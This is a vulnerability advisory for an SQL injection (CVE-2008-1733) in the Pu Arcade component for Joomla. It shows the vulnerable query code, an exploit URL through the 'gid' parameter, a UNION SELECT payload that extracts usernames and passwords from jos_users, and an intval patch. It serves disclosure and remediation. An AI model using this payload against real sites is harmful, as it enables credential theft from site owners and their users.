Pu Arcade component for Joomla - SQL injection

2008.04.11
Credit: MantiS
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2008-1733
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) . SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA . ------------------------------------------------------------------------ -------------------------------------------------- Author : MantiS --------- Vulnerable code : ------------------------ function warningByGame($gid) { global $database; $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c" . " WHERE g.contentratingid = c.id" . " AND g.id = $gid"; $database->setQuery($query); $cont = $database->loadObjectList(); -------------------------- Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gi d=[SQL INJECTION] --------- Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) . Patch : -------- Place before "$query = "SELECT c.id......... " : $gid = intval($_GET['gid']); To force $gid variable conversion at an integer .


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top